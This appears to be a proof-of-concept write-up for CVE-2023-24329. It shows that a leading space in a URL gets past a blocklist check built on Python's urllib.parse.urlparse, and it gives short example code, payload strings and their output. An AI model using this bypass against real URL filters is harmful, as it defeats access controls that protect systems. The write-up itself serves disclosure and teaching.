Example of CVE-2023-24329 # Intro
The URL parsing functions focus on splitting a URL string into its components, or on combining URL components into a URL string.
- [urllib.parse.urlparse](https://docs.python.org/3/library/urllib.parse.html#url-parsing)
**Simply** `urllib.parse` used for parsing urls, we can bypass it with adding blanks before the url. This happens in python `3.11.4` and before.
# PoC
Let's break down `example.py`
Here is a set of websites that you should not access:
```python
blocked_list = [
"http://example.com/",
"http://example2.com/"
]
```
This function checks if website is on blocked list or not, if it's on block list it should return `URL Blocked`
```python
def is_url_blocked(url):
parse = urllib.parse.urlparse(url).geturl()
if parse in blocked_list: return 'URL Blocked'
else: return 'Bypassed'
```
Now I added two urls and I check if any of them is blocked and cannot be accessed:
```python
payload1 = " http://example.com/"
payload2 = "http://example.com/"
print(
is_url_blocked(payload1),
"\n",
is_url_blocked(payload2)
)
```
`payload1` is where i bypassed `is_url_blocked()` because adding long space before the url will bypass `urllib.parse.urlparse(url).geturl()` it would not execute as excpected.
That's why the output is
```
Bypassed
```
But on `payload2` we get
```
URL Blocked
```
# Support
If you would like to support me with donation, I recommend you to give it to someone who really need it please. If you do so then consider that i earned your support.
<a href="https://www.buymeacoffee.com/jawadpy" target="_blank"><img src="https://cdn.buymeacoffee.com/buttons/v2/default-green.png" alt="Buy Me A Coffee" style="height: 60px !important;width: 217px !important;" ></a>
Log in to view the POC file snapshot cached by Shenlong Bot
Log in to view